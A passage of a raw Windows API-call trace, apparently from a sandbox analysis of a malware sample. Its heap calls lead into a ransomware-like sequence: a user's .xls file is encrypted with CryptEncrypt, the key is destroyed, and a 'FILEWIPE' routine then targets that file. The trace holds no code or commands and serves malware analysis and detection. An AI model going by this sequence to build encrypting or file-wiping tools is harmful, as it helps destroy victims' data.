Flags=0x0, Size=0x10) returned 0x9bd5a0 [0172.677] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0172.677] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0172.677] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0172.677] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0172.677] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0172.677] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0172.677] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d420 [0172.677] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4a8 [0172.677] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0172.677] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0172.677] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0172.677] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28d8 [0172.677] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0172.677] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0172.677] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0172.678] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0172.678] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0172.678] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0172.678] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0172.678] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0172.678] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0172.678] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0172.678] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0172.678] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0172.678] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0172.678] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0172.678] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0172.678] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0172.678] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0172.678] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0172.678] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0172.678] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0172.678] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0172.678] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0172.678] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0172.678] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0172.678] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0172.678] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0172.679] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0172.679] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0172.679] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0172.679] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0172.679] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0172.679] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0172.679] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0172.679] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0172.679] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0172.679] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0172.679] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0172.679] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0172.679] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0172.679] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0172.679] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0172.679] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0172.679] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0172.679] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0172.679] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0172.679] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0172.679] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0172.679] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0172.679] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0172.679] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0172.679] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0172.679] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x90d420, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0172.679] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0172.680] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0172.680] GetProcAddress (hModule=0x74f20000, lpProcName="CryptGetKeyParam") returned 0x74f477cb [0172.680] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deec0 | out: hHeap=0x8a0000) returned 1 [0172.680] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0172.680] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0172.680] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0172.680] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0172.680] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0172.680] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0172.680] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deec0 | out: hHeap=0x8a0000) returned 1 [0172.680] CryptGetKeyParam (in: hKey=0x90af18, dwParam=0x7, pbData=0x9c27e8, pdwDataLen=0x87e2f0, dwFlags=0x0 | out: pbData=0x9c27e8*=0x660e, pdwDataLen=0x87e2f0*=0x4) returned 1 [0172.680] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0172.680] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0172.680] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0172.680] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0172.680] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0172.680] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0172.680] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0172.680] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0172.680] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0172.681] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0172.681] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0172.681] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0172.681] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0172.681] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0172.681] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0172.681] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0172.681] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0172.681] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0172.681] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0172.681] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0172.681] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0172.681] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0172.681] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0172.681] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0172.681] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0172.681] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0172.681] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0172.681] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0172.681] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0172.681] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0172.681] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0172.681] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0172.681] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0172.681] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0172.681] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0172.681] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0172.681] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0172.682] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0172.682] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0172.682] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0172.682] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0172.682] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0172.682] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0172.682] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0172.682] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0172.682] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0172.682] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0172.682] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0172.682] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0172.682] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0172.682] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0172.682] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0172.682] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0172.682] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d4c0 | out: hHeap=0x8a0000) returned 1 [0172.682] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0172.682] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0172.682] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0172.682] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0172.682] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0172.682] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0172.682] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0172.682] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0172.683] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0172.683] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0172.683] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d4c0 | out: hHeap=0x8a0000) returned 1 [0172.683] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0172.683] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0172.683] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0172.683] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0172.683] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0172.683] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0172.683] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0172.683] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0172.683] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0172.683] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0172.683] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0172.683] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0172.683] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0172.683] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0172.683] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0172.683] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0172.683] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0172.683] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0172.684] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0172.684] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0172.686] CryptEncrypt (in: hKey=0x90af18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x87e820*=0x14707, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x87e820*=0x14710) returned 1 [0172.686] CharLowerBuffW (in: lpsz="byte[83729]", cchLength=0xb | out: lpsz="byte[83729]") returned 0xb [0172.687] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0172.687] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0172.687] CryptEncrypt (in: hKey=0x90af18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x9edfa0*, pdwDataLen=0x87e820*=0x14707, dwBufLen=0x14710 | out: pbData=0x9edfa0*, pdwDataLen=0x87e820*=0x14710) returned 1 [0172.688] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0172.688] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0172.688] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0172.705] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0172.705] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0172.705] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0172.705] CryptDestroyKey (hKey=0x90af18) returned 1 [0172.732] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0172.732] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0172.732] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0172.732] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0172.732] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0172.732] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0172.732] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0172.732] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0172.732] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0172.732] CryptReleaseContext (hProv=0x9c0b78, dwFlags=0x0) returned 1 [0172.732] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0172.732] FreeLibrary (hLibModule=0x74f20000) returned 1 [0172.735] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0172.735] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\oxnDwHiXTyJqTe06unb5.xls", lpFindFileData=0x87eda0 | out: lpFindFileData=0x87eda0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbabf6780, ftCreationTime.dwHighDateTime=0x1d5d9e2, ftLastAccessTime.dwLowDateTime=0x817489c0, ftLastAccessTime.dwHighDateTime=0x1d5de3c, ftLastWriteTime.dwLowDateTime=0x817489c0, ftLastWriteTime.dwHighDateTime=0x1d5de3c, nFileSizeHigh=0x0, nFileSizeLow=0x14707, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="oxnDwHiXTyJqTe06unb5.xls", cAlternateFileName="OXNDWH~1.XLS")) returned 0x90ae18 [0172.735] FindClose (in: hFindFile=0x90ae18 | out: hFindFile=0x90ae18) returned 1 [0172.736] CharLowerBuffW (in: lpsz="byte[83719]", cchLength=0xb | out: lpsz="byte[83719]") returned 0xb [0172.736] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0172.736] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0172.736] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x75c90000 [0172.737] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0172.737] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0172.737] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="memset", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0172.737] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x7) returned 0x9c2898 [0172.737] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="memset", cchWideChar=7, lpMultiByteStr=0x9c2898, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="memset", lpUsedDefaultChar=0x0) returned 7 [0172.737] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0172.737] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0172.737] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0172.737] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0172.737] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0172.737] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0172.737] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0172.737] FreeLibrary (hLibModule=0x75c90000) returned 1 [0172.737] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0172.737] 